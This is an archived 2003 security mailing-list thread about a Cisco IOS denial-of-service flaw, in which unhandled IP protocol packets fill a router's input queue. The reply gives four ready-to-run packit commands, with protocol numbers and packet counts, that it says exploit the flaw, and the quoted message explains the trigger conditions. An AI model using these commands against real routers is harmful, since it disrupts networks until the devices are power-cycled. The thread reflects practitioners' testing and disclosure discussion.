Hello Curt, You can download the latest packit from http://packit.sourceforge.net. Install and execute one the following commands to exploit the vulnerability: packit -t RAWIP -V 53 -d dst_ip -T ttl_val -c 76 -b 76 packit -t RAWIP -V 55 -d dst_ip -T ttl_val -c 76 -b 76 packit -t RAWIP -V 77 -d dst_ip -T ttl_val -c 76 -b 76 packit -t RAWIP -V 103 -d dst_ip -T ttl_val -c 76 -b 76 Thanks, Darren Bounds On Sun, 2003-07-20 at 14:58, Curt Purdy wrote: > Could we have an example of an hping command to invoke this. I have been > playing with it and would like a real-world example, and since there a now > multiple exploits out, this knowledge should not be a problem. Thanks. > > Curt > > ---------------------------------------- > > Practice safe hex. > > - Andrew Briney, editor Information Security > > > -----Original Message----- > From: Richard Johnson [mailto:rdumpat_private] > Sent: Sunday, July 20, 2003 2:21 AM > To: incidentsat_private > Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS > routers- requires power cycle to recover > > > In article > <Pine.BSO.4.53.0307172223150.11409at_private-guesswork.com>, > Tina Bird <tbird@precision-guesswork.com> wrote: > > > information on the detailed structure of the evil packets in these > > protocols is not yet public AFAIK. > > > The router has problems if it receives a packet, content irrelevant, > that makes it to supervisor level claiming an IP protocol that it > doesn't have code to handle. > > The kickup to supervisor level happens when the packet is targeted > directly at the router's IP address (per first Cisco advisory) or just > has its TTL expire in transit past the router (per revised Cisco > advisory). > > Send enough packets (default 75), and the input queue is full. hping is > enough of a launch platform for that--there's no need for > questionable-source exploit binaries when testing. > > > Richard > > -- > My mailbox. My property. My personal space. My rules. Deal with it. > http://www.river.com/users/share/cluetrain/ > > ---------------------------------------------------------------------------- > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the > world's premier technical IT security event! 10 tracks, 15 training > sessions, > 1,800 delegates from 30 nations including all of the top experts, from CSO's > to > "underground" security specialists. See for yourself what the buzz is > about! > Early-bird registration ends July 3. This event will sell out. > www.blackhat.com > ---------------------------------------------------------------------------- > > > > --------------------------------------------------------------------------- > ---------------------------------------------------------------------------- -- Darren Bounds Security Consultant Information Security Services Intrusense Inc. -- Intrusense - Securing Business As Usual --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 13:44:59 PDT